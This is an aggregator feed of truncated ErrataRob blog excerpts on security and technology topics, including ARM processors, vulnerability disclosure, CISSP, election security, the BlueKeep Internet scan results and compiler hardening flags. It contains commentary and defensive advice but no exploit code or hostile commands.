ErrataRob.webp 2020-06-16 18:38:07 Apple ARM Mac rumors (lien direct) The latest rumor is that Apple is going to announce Macintoshes based on ARM processors at their developer conference. I thought I'd write up some perspectives on this.It's different this timeThis would be Apple's fourth transition. Their original Macintoshes in 1984 used Motorola 68000 microprocessors. They moved to IBM's PowerPC in 1994, then to Intel's x86 in 2005.However, this history is almost certainly the wrong way to look at the situation. In those days, Apple had little choice. Each transition happened because the processor they were using was failing to keep up with technological change. They had no choice but to move to a new processor.This no longer applies. Intel's x86 is competitive on both speed and power efficiency. It's not going away. If Apple transitions away from x86, they'll still be competing against x86-based computers.Other companies have chosen to adopt both x86 and ARM, rather than one or the other. Microsoft's "Surface Pro" laptops come in either x86 or ARM versions. Amazon's AWS cloud servers come in either x86 or ARM versions. Google's Chromebooks come in either x86 or ARM versions.Instead of ARM replacing x86, Apple may be attempting to provide both as options, possibly an ARM CPU for cheaper systems and an x86 for more expensive and more powerful systems.ARM isn't more power efficient than x86Every news story, every single one, is going to repeat the claim that ARM chips are more power efficient than Intel's x86 chips. Some will claim it's because they are RISC whereas Intel is CISC.This isn't true. RISC vs. CISC was a principle in the 1980s when chips were so small that instruction set differences meant architectural differences. Since 1995 with "out-of-order" processors, the instruction set has been completely separated from the underlying architecture. At most, instruction set differences can't account for more than 5% of the difference between processor performance or efficiency.Mobile chips consume less power by simply being slower. When you scale mobile ARM CPUs up to desktop speeds, they consume the same power as desktops. Conversely, when you scale Intel x86 processors down to mobile power consumption levels, they are just as slow. You can test this yourself by comparing Intel's mobile-oriented "Atom" processor against ARM processors in the Raspberry Pi.Moreover, the CPU accounts for only a small part of overall power consumption. Mobile platforms care more about the graphics processor or video acceleration than they do the CPU. Large differences in CPU efficiency mean small differences in overall platform efficiency.Apple certainly balances its chips so they work better in phones than an Intel x86 would, but these tradeoffs mean they'd work worse in laptops.While overall performance and efficiency will be similar, specific application will perform differently. Thus, when ARM Macintoshes arrive, people will choose just the right benchmarks to "prove" their inherent superiority. It won't be true, but everyone will believe it to be true.No longer a desktop companyVenture capitalist Mary Meeker produces yearly reports on market trends. The desktop computer market has been stagnant for over a decade in the face of mobile growth. The Macintosh is only 10% of Apple's business -- so little that they could abandon the business without noticing a difference.This means investing in the Macintosh business is a poor business decision. Such investment isn't going to produce growth. Investing in a major transition from x86 to ARM is therefore stupid -- it'll cost a lot of money without generating any return.In particular, despite having a mobile CPU for their iPhone, they still don't have a CPU optimized for laptops and desktops. The Macintosh market is just to small to fund Guideline
ErrataRob.webp 2020-05-19 18:03:23 Securing work-at-home apps (lien direct) In today's post, I answer the following question:Our customer's employees are now using our corporate application while working from home. They are concerned about security, protecting their trade secrets. What security feature can we add for these customers?The tl;dr answer is this: don't add gimmicky features, but instead, take this opportunity to do security things you should already be doing, starting with a "vulnerability disclosure program" or "vuln program".GimmicksFirst of all, I'd like to discourage you from adding security gimmicks to your product. You are no more likely to come up with an exciting new security feature on your own as you are a miracle cure for the covid. Your sales and marketing people may get excited about the feature, and they may get the customer excited about it too, but the excitement won't last.Eventually, the customer's IT and cybersecurity teams will be brought in. They'll quickly identify your gimmick as snake oil, and you'll have made an enemy of them. They are already involved in securing the server side, the work-at-home desktop, the VPN, and all the other network essentials. You don't want them as your enemy, you want them as your friend. You don't want to send your salesperson into the maw of a technical meeting at the customer's site trying to defend the gimmick.You want to take the opposite approach: do something that the decision maker on the customer side won't necessarily understand, but which their IT/cybersecurity people will get excited about. You want them in the background as your champion rather than as your opposition.Vulnerability disclosure programTo accomplish this goal described above, the thing you want is known as a vulnerability disclosure program. If there's one thing that the entire cybersecurity industry is agreed about (other than hating the term cybersecurity, preferring "infosec" instead) is that you need this vulnerability disclosure program. Everything else you might want to do to add security features in your product come after you have this thing.Your product has security bugs, known as vulnerabilities. This is true of everyone, no matter how good you are. Apple, Microsoft, and Google employ the brightest minds in cybersecurity and they have vulnerabilities. Every month you update their products with the latest fixes for these vulnerabilities. I just bought a new MacBook Air and it's already telling me I need to update the operating system to fix the bugs found after it shipped.These bugs come mostly from outsiders. These companies have internal people searching for such bugs, as well as consultants, and do a good job quietly fixing what they find. But this goes only so far. Outsiders have a wider set of skills and perspectives than the companies could ever hope to control themselves, so find things that the companies miss.These outsiders are often not customers.This has been a chronic problem throughout the history of computers. Somebody calls up your support line and tells you there's an obvious bug that hackers can easily exploit. The customer support representative then ignores this because they aren't a customer. It's foolish wasting time adding features to a product that no customer is asking for.But then this bug leaks out to the public, hackers widely exploit it damaging customers, and angry customers now demand why you did nothing to fix the bug despite having been notified about it.The problem here is that nobody has the job of responding to such problems. The reason your company dropped the ball was that nobody was assigned to pick it up. All a vulnerability disclosure program means that at least one person within the company has the responsibility of dealing with it.How to set up vulnerability disclosure program Spam Vulnerability Threat Guideline ★★★
ErrataRob.webp 2020-05-13 15:31:34 CISSP is at most equivalent to a 2-year associates degree (lien direct) There are few college programs for "cybersecurity". Instead, people rely upon industry "certifications", programs that attempt to certify a person has the requisite skills. The most popular is known as the "CISSP". In the news today, European authorities decided a "CISSP was equivalent to a masters degree". I think this news is garbled. Looking into the details, studying things like "UK NARIK RQF level 11", it seems instead that equivalency isn't with master's "degrees" so much as with post-graduate professional awards and certifications that are common in industry. Even then, it places CISSP at too high a level: it's an entry level certification that doesn't require a college degree, and teaches students only familiarity with buzzwords used in the industry rather than the deeper level of understanding of how things work.Recognition of equivalent qualifications and skillsThe outrage over this has been "equivalent to a master's degree". I don't think this is the case. Instead, it seems "equivalent to professional awards and recognition".The background behind this is how countries recognize "equivalent" work done in other countries. For example, a German Diplom from a university is a bit more than a U.S. bachelor's degree, but a bit less than a U.S. master's degree. How, then, do you find an equivalent between the two?Part of this is occupational, vocational, and professional awards, certifications, and other forms of recognition. A lot of practical work experience is often equivalent to, and even better than, academic coursework.The press release here discusses the UK's NARIC RQF framework, putting the CISSP at level 11. This makes it equivalent to post-graduate coursework and various forms of professional recognition.I'm not sure it means it's the same as a "master's degree". At RQF level 11, there is a fundamental difference between an "award" requiring up to 120 hours of coursework, a "certificate", and a "degree" requiring more than 370 hours of coursework. Assuming everything else checks out, this would place the CISSP at the "award" level, not a "certificate" or "degree" level.The question here is whether the CISSP deserve recognition along with other professional certifications. Below I will argue that it doesn't.Superficial not technicalThe CISSP isn't a technical certification. It covers all the buzzwords in the industry so you know what they refer to, but doesn't explain how anything works. You are tested on the definition of the term "firewall" but you aren't tested on any detail about how firewalls work.This is has an enormous impact on the cybersecurity industry with hordes of "certified" professionals who are none-the-less non-technical, not knowing how things work.This places the CISSP clearly at some lower RQF level. The "RQF level 11" is reserved for people with superior understanding how things work, whereas the CISSP is really an entry-level certification.No college degree requiredThe other certifications at this level tend to require a college degree. They are a refinement of what was learned in college.The opposite is true of the CISSP. It requires no college degree.Now, I'm not a fan of college degrees. Idiots seem capable of getting such degrees without understanding the content, so they are not a good badge of expertise. But at least the majority of college programs take students deeper into understanding the theory of how things work rat Guideline
ErrataRob.webp 2020-03-04 15:05:04 A requirements spec for voting (lien direct) In software development, we start with a "requirements specification" defining what the software is supposed to do. Voting machine security is often in the news, with suspicion the Russians are trying to subvert our elections. Would blockchain or mobile phone voting work? I don't know. These things have tradeoffs that may or may not work, depending upon what the requirements are. I haven't seen the requirements written down anywhere. So I thought I'd write some.One requirement is that the results of an election must seem legitimate. That's why responsible candidates have a "concession speech" when they lose. When John McCain lost the election to Barack Obama, he started his speech with:"My friends, we have come to the end of a long journey. The American people have spoken, and they have spoken clearly. A little while ago, I had the honor of calling Sen. Barack Obama - to congratulate him on being elected the next president of the country that we both love."This was important. Many of his supporters were pointing out irregularities in various states, wanting to continue the fight. But there are always irregularities, or things that look like irregularities. In every election, if a candidate really wanted to, they could drag out an election indefinitely investigating these irregularities. Responsible candidates therefore concede with such speeches, telling their supporters to stop fighting.It's one of the problematic things in our current election system. Even before his likely loss to Hillary, Trump was already stirring up his voters to continue to the fight after the election. He actually won that election, so the fight never occurred, but it was likely to occur. It's hard to imagine Trump ever conceding a fairly won election. I hate to single out Trump here (though he deserves criticism on this issue) because it seems these days both sides are convinced now that the other side is cheating.The goal of adversaries like Putin's Russia isn't necessarily to get favored candidates elected, but to delegitimize the candidates who do get elected. As long as the opponents of the winner believe they have been cheated, then Russia wins.Is the actual requirement of election security that the elections are actually secure? Or is the requirement instead that they appear secure? After all, when two candidates have nearly 50% of the real vote, then it doesn't really matter which one has mathematical legitimacy. It matters more which has political legitimacy.Another requirement is that the rules be fixed ahead of time. This was the big problem in the Florida recounts in the 2000 Bush election. Votes had ambiguities, like hanging chad. The legislature come up with rules how to resolve the ambiguities, how to count the votes, after the votes had been cast. Naturally, the party in power who comes up with the rules will choose those that favor the party.The state of Georgia recently pass a law on election systems. Computer scientists in election security criticized the law because it didn't have their favorite approach, voter verifiable paper ballots. Instead, the ballot printed a bar code.But the bigger problem with the law is that it left open what happens if tampering is discovered. If an audit of the paper ballots finds discrepancies, what happens then? The answer is the legislature comes up with more rules. You don't need to secretly tamper with votes, you can instead do so publicly, so that everyone knows the vote was tampered with. This then throws the problem to the state legislature to decide the victor.Even the most perfectly secured voting system proposed by academics doesn't solve the problem. It'll detect voter tampering, but doesn't resolve when tampering is detected. What do you do with tampered votes? If you throw them out, it means one candidate wins. If you somehow fix them, it means the other candidate w Guideline
ErrataRob.webp 2019-12-13 16:50:17 This is finally the year of the ARM server (lien direct) "RISC" was an important architecture from the 1980s when CPUs had fewer than 100,000 transistors. By simplifying the instruction set, they free up transistors for more registers and better pipelining. It meant executing more instructions, but more than making up for this by executing them faster.But once CPUs exceed a million transistors around 1995, they moved to Out-of-Order, superscalar architectures. OoO replaces RISC by decoupling the front-end instruction-set with the back-end execution. A "reduced instruction set" no longer matters, the backend architecture differs little between Intel and competing RISC chips like ARM. Yet people have remained fixated on instruction set. The reason is simply politics. Intel has been the dominant instruction set for the computers we use on servers, desktops, and laptops. Many instinctively resist whoever dominates. In addition, colleges indoctrinate students on the superiority of RISC. Much college computer science instruction is decades out of date.For 10 years, the ignorant press has been championing the cause of ARM's RISC processors in servers. The refrain has always been that RISC has some inherent power efficiency advantage, and that ARM processors with natural power efficiency from the mobile world will be more power efficient for the data center.None of this is true. There are plenty of RISC alternatives to Intel, like SPARC, POWER, and MIPS, and none of them ended up having a power efficiency advantage.Mobile chips aren't actually power efficient. Yes, they consume less power, but because they are slower. ARM's mobile chips have roughly the same computations-per-watt as Intel chips. When you scale them up to the same amount of computations as Intel's server chips, they end up consuming just as much power.People are essentially innumerate. They can't do this math. The only factor they know is that ARM chips consume less power. They can't factor into the equation that they are also doing fewer computations.There have been three attempts by chip makers to produce server chips to complete against Intel. The first attempt was the "flock of chickens" approach. Instead of one beefy OoO core, you make a chip with a bunch of wimpy traditional RISC cores.That's not a bad design for highly-parallel, large-memory workloads. Such workloads spread themselves efficiently across many CPUs, and spend a lot of time halted, waiting for data to be returned from memory.But such chips didn't succeed in the market. The basic reason was that interconnecting all the cores introduced so much complexity and power consumption that it wasn't worth the effort.The second attempt was multi-threaded chips. Intel's chips support two threads per core, so that when one thread halts waiting for memory, the other thread can continue processing what's already stored in cache and in registers. It's a cheap way for processors to increase effective speed while adding few additional transistors to the chip. But it has decreasing marginal returns, which is why Intel only supports two threads. Vendors created chips with as many as 8 threads per core. Again, they were chasing the highly parallel workloads that waited on memory. Only with multithreaded chips, they could avoid all that interconnect nastiness.This still didn't work. The chips were quite good, but it turns out that these workloads are only a small portion of the market.Finally, chip makers decided to compete head-to-head with Intel by creating server chips optimized for the same workloads as Intel, with fast single-threaded performance. A good example was Qualcomm, who created a server chip that CloudFlare promised to use. They announced this to much fanfare, then abandoned it a few months later as nobody adopted it.The reason was simply that when you scaled to Intel-like performance, you have Intel-like liabilities. Your only customers are the innumerate who can't do math, who believe like emperors Guideline
ErrataRob.webp 2019-09-26 13:24:44 CrowdStrike-Ukraine Explained (lien direct) Trump's conversation with the President of Ukraine mentions "CrowdStrike". I thought I'd explain this.What was said?This is the text from the conversation covered in this“I would like you to find out what happened with this whole situation with Ukraine, they say Crowdstrike... I guess you have one of your wealthy people... The server, they say Ukraine has it.”Personally, I occasionally interrupt myself while speaking, so I'm not sure I'd criticize Trump here for his incoherence. But at the same time, we aren't quite sure what was meant. It's only meaningful in the greater context. Trump has talked before about CrowdStrike's investigation being wrong, a rich Ukrainian owning CrowdStrike, and a "server". He's talked a lot about these topics before.Who is CrowdStrike?They are a cybersecurity firm that, among other things, investigates hacker attacks. If you've been hacked by a nation state, then CrowdStrike is the sort of firm you'd hire to come and investigate what happened, and help prevent it from happening again.Why is CrowdStrike mentioned?Because they were the lead investigators in the DNC hack who came to the conclusion that Russia was responsible. The pro-Trump crowd believes this conclusion is false. If the conclusion is false, then it must mean CrowdStrike is part of the anti-Trump conspiracy.Trump always had a thing for CrowdStrike since their first investigation. It's intensified since the Mueller report, which solidified the ties between Trump-Russia, and Russia-DNC-Hack.Personally, I'm always suspicious of such investigations. Politics, either grand (on this scale) or small (internal company politics) seem to drive investigations, creating firm conclusions based on flimsy evidence. But CrowdStrike has made public some pretty solid information, such as BitLy accounts used both in the DNC hacks and other (known) targets of state-sponsored Russian hackers. Likewise, the Mueller report had good data on Bitcoin accounts. I'm sure if I looked at all the evidence, I'd have more doubts, but at the same time, of the politicized hacking incidents out there, this seems to have the best (public) support for the conclusion.What's the conspiracy?The basis of the conspiracy is that the DNC hack was actually an inside job. Some former intelligence officials lead by Bill Binney claim they looked at some data and found that the files were copied "locally" instead of across the Internet, and therefore, it was an insider who did it and not a remote hacker.I debunk the claim here, but the short explanation is: of course the files were copied "locally", the hacker was inside the network. In my long experience investigating hacker intrusions, and performing them myself, I know this is how it's normally done. I mention my own experience because I'm technical and know these things, in contrast with Bill Binney and those other intelligence officials who have no experience with such things. He sounds impressive that he's formerly of the NSA, but he was a mid-level manager in charge of budgets. Binney has never performed a data breach investigation, has never performed a pentest.There's other parts to the conspiracy. In the middle of all this, a DNC staffer was murdered on the street, possibley due to a mugging. Naturally this gets included as part of the conspiracy, this guy ("Seth Rich") must've been the "insider" in this attack, and mus Data Breach Hack Guideline NotPetya
ErrataRob.webp 2019-08-31 10:18:49 Thread on network input parsers (lien direct) This blogpost contains a long Twitter thread on input parsers. I thought I'd copy the thread here as a blogpost.
I am spending far too long on this chapter on "parsers". It's this huge gaping hole in Computer Science where academics don't realize it's a thing. It's like physics missing one of Newton's laws, or medicine ignoring broken bones, or chemistry ignoring fluorine.The problem is that without existing templates of how "parsing" should be taught, it's really hard coming up with a structure for describing it from scratch."Langsec" has the best model, but at the same time, it's a bit abstract ("input is a language that drives computation"), so I want to ease into it with practical examples for programmers.
Guideline
ErrataRob.webp 2019-08-04 18:52:45 Securing devices for DEFCON (lien direct) There's been much debate whether you should get burner devices for hacking conventions like DEF CON (phones or laptops). A better discussion would be to list those things you should do to secure yourself before going, just in case.These are the things I worry about:backup before you goupdate before you gocorrectly locking your devices with full disk encryptioncorrectly configuring WiFiBluetooth devicesMobile phone vs. StingraysUSBBackupTraveling means a higher chance of losing your device. In my review of crime statistics, theft seems less of a threat than whatever city you are coming from. My guess is that while thieves may want to target tourists, the police want to even more the target gangs of thieves, to protect the cash cow that is the tourist industry. But you are still more likely to accidentally leave a phone in a taxi or have your laptop crushed in the overhead bin. If you haven't recently backed up your device, now would be an extra useful time to do this.Anything I want backed up on my laptop is already in Microsoft's OneDrive, so I don't pay attention to this. However, I have a lot of pictures on my iPhone that I don't have in iCloud, so I copy those off before I go.UpdateLike most of you, I put off updates unless they are really important, updating every few months rather than every month. Now is a great time to make sure you have the latest updates.Backup before you update, but then, I already mentioned that above.Full disk encryptionThis is enabled by default on phones, but not the default for laptops. It means that if you lose your device, adversaries can't read any data from it.You are at risk if you have a simple unlock code, like a predicable pattern or a 4-digit code. The longer and less predictable your unlock code, the more secure you are.I use iPhone's "face id" on my phone so that people looking over my shoulder can't figure out my passcode when I need to unlock the phone. However, because this enables the police to easily unlock my phone, by putting it in front of my face, I also remember how to quickly disable face id (by holding the buttons on both sides for 2 seconds).As for laptops, it's usually easy to enable full disk encryption. However there are some gotchas. Microsoft requires a TPM for its BitLocker full disk encryption, which your laptop might not support. I don't know why all laptops don't just have TPMs, but they don't. You may be able to use some tricks to get around this. There are also third party full disk encryption products that use simple passwords.If you don't have a TPM, then hackers can brute-force crack your password, trying billions per second. This applies to my MacBook Air, which is the 2017 model before Apple started adding their "T2" chip to all their laptops. Therefore, I need a strong login password.I deal with this on my MacBook by having two accounts. When I power on the device, I log into an account using a long/complicated password. I then switch to an account with a simpler account for going in/out of sleep mode. This second account can't be used to decrypt the drive.On Linux, my password to decrypt the drive is similarly long, while the user account password is pretty short.I ignore the "evil maid" threat, because my devices are always with me rather than in Hack Threat Guideline
ErrataRob.webp 2019-07-28 15:21:32 Why we fight for crypto (lien direct) This last week, the Attorney General William Barr called for crypto backdoors. His speech is a fair summary of law-enforcement's side of the argument. In this post, I'm going to address many of his arguments.The tl;dr version of this blog post is this:Their claims of mounting crime are unsubstantiated, based on emotional anecdotes rather than statistics. We live in a Golden Age of Surveillance where, if any balancing is to be done in the privacy vs. security tradeoff, it should be in favor of more privacy.But we aren't talking about tradeoff with privacy, but other rights. In particular, it's every much as important to protect the rights of political dissidents to keep some communications private (encryption) as it is to allow them to make other communications public (free speech). In addition, there is no solution to their "going dark" problem that doesn't restrict the freedom to run arbitrary software of the user's choice on their computers/phones.Thirdly, there is the problem of technical feasibility. We don't know how to make backdoors available for law enforcement access that doesn't enormously reduce security for users.BalanceThe crux of his argument is balancing civil rights vs. safety, also described as privacy vs. security. This balance is expressed in the constitution by the Fourth Amendment. The 4rth doesn't express an absolute right to privacy, but allows for police to invade your privacy if they can show an independent judge that they have "probable cause". By making communications "warrant proof", encryption is creating a "law free zone" enabling crime to be conducted without the ability of the police to investigate.It's a reasonable argument. If your child gets kidnapped by sex traffickers, you'll be demanding the police do something, anything to get your child back safe. If a phone is found at the scene, you'll definitely want them to have the ability to decrypt the phone, as long as a judge gives them a search warrant to balance civil liberty concerns.However, this argument is wrong, as I'll discuss below.Law free zonesBarr claims encryption creates a new "law free zone ... giving criminals the means to operate free of lawful scrutiny". He pretends that such zones never existed before.Of course they've existed before. Attorney-client privilege is one example, which is definitely abused to further crime. Barr's own boss has committed obstruction of justice, hiding behind the law-free zone of Article II of the constitution. We are surrounded by legal loopholes that criminals exploit in order to commit crimes, where the cost of closing the loophole is greater than the benefit.The biggest "law free zone" that exists is just the fact that we don't live in a universal surveillance state. I think impure thoughts without the police being able to read my mind. I can whisper quietly in your ear at a bar without the government overhearing. I can invite you over to my house to plot nefarious deeds in my living room.Technology didn't create these zones. However, technological advances are allowing police to defeat them.Business's have security cameras everywhere. Neighborhood associations are installing license plate readers. We are putting Echo/OkGoogle/Cortana/Siri devices in our homes listening to us. Our phones and computers have microphones and cameras. Our TV's increasingly have cameras and mics, too, in case we want to use them for video conferencing, or give them voice commands.Every argument Barr makes about crypto backdoors applies to backdoor access to microphones, every arguments applies to forcing TVs to have a backdoor allowing police armed with a warrant to turn on the camera in your living room. These Guideline
ErrataRob.webp 2019-05-29 20:16:09 Your threat model is wrong (lien direct) Several subjects have come up with the past week that all come down to the same thing: your threat model is wrong. Instead of addressing the the threat that exists, you've morphed the threat into something else that you'd rather deal with, or which is easier to understand.PhishingAn example is this question that misunderstands the threat of "phishing":Should failing multiple phishing tests be grounds for firing? I ran into a guy at a recent conference, said his employer fired people for repeatedly falling for (simulated) phishing attacks. I talked to experts, who weren't wild about this disincentive. https://t.co/eRYPZ9qkzB pic.twitter.com/Q1aqCmkrWL- briankrebs (@briankrebs) May 29, 2019The (wrong) threat model is here is that phishing is an email that smart users with training can identify and avoid. This isn't true.Good phishing messages are indistinguishable from legitimate messages. Said another way, a lot of legitimate messages are in fact phishing messages, such as when HR sends out a message saying "log into this website with your organization username/password".Recently, my university sent me an email for mandatory Title IX training, not digitally signed, with an external link to the training, that requested my university login creds for access, that was sent from an external address but from the Title IX coordinator.- Tyler Pieron (@tyler_pieron) May 29, 2019Yes, it's amazing how easily stupid employees are tricked by the most obvious of phishing messages, and you want to point and laugh at them. But frankly, you want the idiot employees doing this. The more obvious phishing attempts are the least harmful and a good test of the rest of your security -- which should be based on the assumption that users will frequently fall for phishing.In other words, if you paid attention to the threat model, you'd be mitigating the threat in other ways and not even bother training employees. You'd be firing HR idiots for phishing employees, not punishing employees for getting tricked. Your systems would be resilient against successful phishes, such as using two-factor authentication.IoT securityAfter the Mirai worm, government types pushed for laws to secure IoT devices, as billions of insecure devices like TVs, cars, security cameras, and toasters are added to the Internet. Everyone is afraid of the next Mirai-type worm. For example, they are pushing for devices to be auto-updated.But auto-updates are a bigger threat than worms.Since Mirai, roughly 10-billion new IoT devices have been added to the Internet, yet there hasn't been a Mirai-sized worm. Why is that? After 10-billion new IoT devices, it's still Windows and not IoT that is the main problem.The answer is that number, 10-billion. Internet worms work by guessing IPv4 addresses, of which there are only 4-billion. You can't have 10-billion new devices on the public IPv4 addresses because there simply aren't enough addresses. Instead, those 10-billion devices are almost entirely being put on private ne Ransomware Tool Vulnerability Threat Guideline FedEx NotPetya
ErrataRob.webp 2019-05-28 06:20:06 Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708) (lien direct) Microsoft announced a vulnerability in it's "Remote Desktop" product that can lead to robust, wormable exploits. I scanned the Internet to assess the danger. I find nearly 1-million devices on the public Internet that are vulnerable to the bug. That means when the worm hits, it'll likely compromise those million devices. This will likely lead to an event as damaging as WannaCry and notPetya from 2017 -- potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.To scan the Internet, I started with masscan, my Internet-scale port scanner, looking for port 3389, the one used by Remote Desktop. This takes a couple hours, and lists all the devices running Remote Desktop -- in theory.This returned 7,629,102 results (over 7-million). However, there is a lot of junk out there that'll respond on this port. Only about half are actually Remote Desktop.Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It's a thousand times slower, but it's only scanning the results from masscan instead of the entire Internet.The table of results is as follows:1447579  UNKNOWN - receive timeout1414793  SAFE - Target appears patched1294719  UNKNOWN - connection reset by peer1235448  SAFE - CredSSP/NLA required 923671  VULNERABLE -- got appid 651545  UNKNOWN - FIN received 438480  UNKNOWN - connect timeout 105721  UNKNOWN - connect failed 9  82836  SAFE - not RDP but HTTP  24833  UNKNOWN - connection reset on connect   3098  UNKNOWN - network error   2576  UNKNOWN - connection terminatedThe various UNKNOWN things fail for various reasons. A lot of them are because the protocol isn't actually Remote Desktop and respond weirdly when we try to talk Remote Desktop. A lot of others are Windows machines, sometimes vulnerable and sometimes not, but for some reason return errors sometimes.The important results are those marked VULNERABLE. There are 923,671 vulnerable machines in this result. That means we've confirmed the vulnerability really does exist, though it's possible a small number of these are "honeypots" deliberately pretending to be vulnerable in order to monitor hacker activity on the Internet.The next result are those marked SAFE due to probably being "pached". Actually, it doesn't necessarily mean they are patched Windows boxes. They could instead be non-Windows systems that appear the same as patched Windows boxes. But either way, they are safe from this vulnerability. There are 1,414,793 of them.The next result to look at are those marked SAFE due to CredSSP/NLA failures, of which there are 1,235,448. This doesn't mean they are patched, but only that we can't exploit them. They require "network level authentication" first before we can talk Remote Desktop to them. That means we can't test whether they are patched or vulnerable -- but neither can the hackers. They may still be exploitable via an insider threat who knows a valid username/password, but they aren't exploitable by anonymous hackers or worms.The next category is marked as SAFE because they aren't Remote Desktop at all, but HTTP servers. In other words, in response to o Ransomware Vulnerability Threat Patching Guideline NotPetya Wannacry
ErrataRob.webp 2019-05-27 19:59:38 A lesson in journalism vs. cybersecurity (lien direct) A recent NYTimes article blaming the NSA for a ransomware attack on Baltimore is typical bad journalism. It's an op-ed masquerading as a news article. It cites many to support the conclusion the NSA is to be blamed, but only a single quote, from the NSA director, from the opposing side. Yet many experts oppose this conclusion, such as @dave_maynor, @beauwoods, @daveaitel, @riskybusiness, @shpantzer, @todb, @hrbrmst, ... It's not as if these people are hard to find, it's that the story's authors didn't look.The main reason experts disagree is that the NSA's Eternalblue isn't actually responsible for most ransomware infections. It's almost never used to start the initial infection -- that's almost always phishing or website vulns. Once inside, it's almost never used to spread laterally -- that's almost always done with windows networking and stolen credentials. Yes, ransomware increasingly includes Eternalblue as part of their arsenal of attacks, but this doesn't mean Eternalblue is responsible for ransomware.The NYTimes story takes extraordinary effort to jump around this fact, deliberately misleading the reader to conflate one with the other. A good example is this paragraph:That link is a warning from last July about the "Emotet" ransomware and makes no mention of EternalBlue. Instead, the story is citing anonymous researchers claiming that EthernalBlue has been added to Emotet since after that DHS warning.Who are these anonymous researchers? The NYTimes article doesn't say. This is bad journalism. The principles of journalism are that you are supposed to attribute where you got such information, so that the reader can verify for themselves whether the information is true or false, or at least, credible.And in this case, it's probably false. The likely source for that claim is this article from Malwarebytes about Emotet. They have since retracted this claim, as the latest version of their article points out.In any event, the NYTimes article claims that Emotet is now "relying" on the NSA's EternalBlue to spread. That's not the same thing as "using", not even close. Yes, lots of ransomware has been updated to also use Eternalblue to spread. However, what ransomware is relying upon is still the Wind Ransomware Malware Patching Guideline NotPetya Wannacry
ErrataRob.webp 2019-04-23 00:18:02 Programming languages infosec professionals should learn (lien direct) Code is an essential skill of the infosec professional, but there are so many languages to choose from. What language should you learn? As a heavy coder, I thought I'd answer that question, or at least give some perspective.The tl;dr is JavaScript. Whatever other language you learn, you'll also need to learn JavaScript. It's the language of browsers, Word macros, JSON, NodeJS server side, scripting on the command-line, and Electron apps. You'll also need to a bit of bash and/or PowerShell scripting skills, SQL for database queries, and regex for extracting data from text files. Other languages are important as well, Python is very popular for example. Actively avoid C++ and PHP as they are obsolete.Also tl;dr: whatever language you decide to learn, also learn how to use an IDE with visual debugging, rather than just a text editor. That probably means Visual Code from Microsoft. Also, whatever language you learn, stash your code at GitHub.Let's talk in general terms. Here are some types of languages.Unavoidable. As mentioned above, familiarity with JavaScript, bash/Powershell, and SQL are unavoidable. If you are avoiding them, you are doing something wrong.Small scripts. You need to learn at least one language for writing quick-and-dirty command-line scripts to automate tasks or process data. As a tool using animal, this is your basic tool. You are a monkey, this is the stick you use to knock down the banana. Good choices are JavaScript, Python, and Ruby. Some domain-specific languages can also work, like PHP and Lua. Those skilled in bash/PowerShell can do a surprising amount of "programming" tasks in those languages. Old timers use things like PERL or TCL. Sometimes the choice of which language to learn depends upon the vast libraries that come with the languages, especially Python and JavaScript libraries.Development languages.  Those scripting languages have grown up into real programming languages, but for the most part, "software development" means languages designed for that task like C, C++, Java, C#, Rust, Go, or Swift.Domain-specific languages. The language Lua is built into nmap, snort, Wireshark, and many games. Ruby is the language of Metasploit. Further afield, you may end up learning languages like R or Matlab. PHP is incredibly important for web development. Mobile apps may need Java, C#, Kotlin, Swift, or Objective-C.As an experienced developer, here are my comments on the various languages, sorted in alphabetic order.bash (and other Unix shells)You have to learn some bash for dealing with the command-line. But it's also a fairly completely programming language. Perusing the scripts in an average Linux distribution, especially some of the older ones, and you'll find that bash makes up a substantial amount of what we think of as the Linux operating system. Actually, it's called bash/Linux.In the Unix world, there are lots of other related shells that aren't bash, which have slightly different syntax. A good example is BusyBox which has "ash". I mention this because my bash skills are rather poor partly because I originally learned "csh" and get my syntax variants confused.As a hard-core developer, I end up just programming in JavaScript or even C rather than trying to create complex bash scripts. But you shouldn't look down on complex bash scripts, because they can do great things. In particular, if you are a pentester, the shell is often the only language you'll get when hacking into a system, sod good bash language skills are a must.CThis is the development language I use the most, simply because I'm an old-time "systems" developer. What "systems programming" means i Guideline
ErrataRob.webp 2018-12-15 22:40:22 Notes on Build Hardening (lien direct) I thought I'd comment on a paper about "build safety" in consumer products, describing how software is built to harden it against hackers trying to exploit bugs.What is build safety?Modern languages (Java, C#, Go, Rust, JavaScript, Python, etc.) are inherently "safe", meaning they don't have "buffer-overflows" or related problems.However, C/C++ is "unsafe", and is the most popular language for building stuff that interacts with the network. In other cases, while the language itself may be safe, it'll use underlying infrastructure ("libraries") written in C/C++. When we are talking about hardening builds, making them safe or security, we are talking about C/C++.In the last two decades, we've improved both hardware and operating-systems around C/C++ in order to impose safety on it from the outside. We do this with  options when the software is built (compiled and linked), and then when the software is run.That's what the paper above looks at: how consumer devices are built using these options, and thereby, measuring the security of these devices.In particular, we are talking about the Linux operating system here and the GNU compiler gcc. Consumer products almost always use Linux these days, though a few also use embedded Windows or QNX. They are almost always built using gcc, though some are built using a clone known as clang (or llvm).How software is builtSoftware is first compiled then linked. Compiling means translating the human-readable source code into machine code. Linking means combining multiple compiled files into a single executable.Consider a program hello.c. We might compile it using the following command:gcc -o hello hello.cThis command takes the file, hello.c, compiles it, then outputs -o an executable with the name hello.We can set additional compilation options on the command-line here. For example, to enable stack guards, we'd compile with a command that looks like the following:gcc -o hello -fstack-protector hello.cIn the following sections, we are going to look at specific options and what they do.Stack guardsA running program has various kinds of memory, optimized for different use cases. One chunk of memory is known as the stack. This is the scratch pad for functions. When a function in the code is called, the stack grows with additional scratchpad needs of that functions, then shrinks back when the function exits. As functions call other functions, which call other functions, the stack keeps growing larger and larger. When they return, it then shrinks back again.The scratch pad for each function is known as the stack frame. Among the things stored in the stack frame is the return address, where the function was called from so that when it exits, the caller of the function can continue executing where it left off.The way stack guards work is to stick a carefully constructed value in between each stack frame, known as a canary. Right before the function exits, it'll check this canary in order to validate it hasn't been corrupted. If corruption is detected, the program exits, or crashes, to prevent worse things from happening.This solves the most common exploited vulnerability in C/C++ code, the stack buffer-overflow. This is the bug described in that famous paper Smashing the Stack for Fun and Profit& Guideline
